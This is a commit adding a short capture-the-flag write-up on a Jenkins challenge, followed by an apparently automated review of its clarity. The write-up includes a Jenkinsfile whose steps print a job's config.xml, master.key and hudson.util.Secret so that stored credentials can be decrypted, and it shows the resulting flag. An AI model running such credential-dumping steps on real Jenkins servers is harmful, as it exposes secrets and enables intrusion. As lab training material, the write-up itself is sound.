path: root/punkctf/jenkins_03.md
author: Aria <me@aria.rip> 2023-10-01 17:23:09 +0100
committer: Aria <me@aria.rip> 2023-10-01 17:23:09 +0100
commit: b5b9cf7a1f61d004d7d53584d029c19302c63ba0 (patch)
tree: 49c3022dccf669f9f2b905ddfbd2d16db2d10d84 /punkctf/jenkins_03.md
initial commit
Diffstat (limited to 'punkctf/jenkins_03.md')
-rw-r--r-- punkctf/jenkins_03.md 24
1 files changed, 24 insertions, 0 deletions
diff --git a/punkctf/jenkins_03.md b/punkctf/jenkins_03.md
new file mode 100644
index 0000000..2ebfbe0
--- /dev/null
+++ b/punkctf/jenkins_03.md
@@ -0,0 +1,24 @@
+
+Jenkins doesn't provide any sort of sandboxing, but it tells you your build runs in `/var/jenkins_home/jobs/...`.
+You can modify the `Jenkinsfile` to enumerate `/var/jenkins_home`, using `find` or whatever else.
+
+From this we're able to read all the config files, including the one for secure jobs in `/var/jenkins_home/jobs/secure-jobs/config.xml`.
+The credentials in here are encrypted, but since we're able to read everything Jenkins can, we can find the key. I found [this](https://github.com/hoto/jenkins-credentials-decryptor) tool to do so.
+
+This `Jenkinsfile` gets everything we need for decryption.
+
+```
+pipeline {
+ agent any
+ stages {
+ stage('build') {
+ steps {
+ sh 'cat /var/jenkins_home/jobs/secure-jobs/config.xml'
+ sh 'cat /var/jenkins_home/secrets/master.key'
+ sh 'cat /var/jenkins_home/secrets/hudson.util.Secret | base64'
+ }
+ }
+ }
+}
+```
+Then we simply feed everything into the decryptor to get `punk_{GBI3BZOA3E8USYUH}`.
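Review bot: The last step is not reproducible from what is written: in the `steps` block `hudson.util.Secret` is piped through `base64` while `master.key` is printed raw, and the closing sentence only says to "feed everything into the decryptor" without saying that the base64 output has to be decoded back into a file first or which of the three outputs goes where. A sentence after the code block covering why that one file is encoded and how the three outputs were saved would close the gap. It is also worth stating that all three `cat` lines write their output into the build console log, so the key material stays readable to anyone who can view that build afterwards. Smaller points: the added file opens with a blank line and has no title heading, the code fence has no language tag, and there is no blank line between the closing fence and the final sentence.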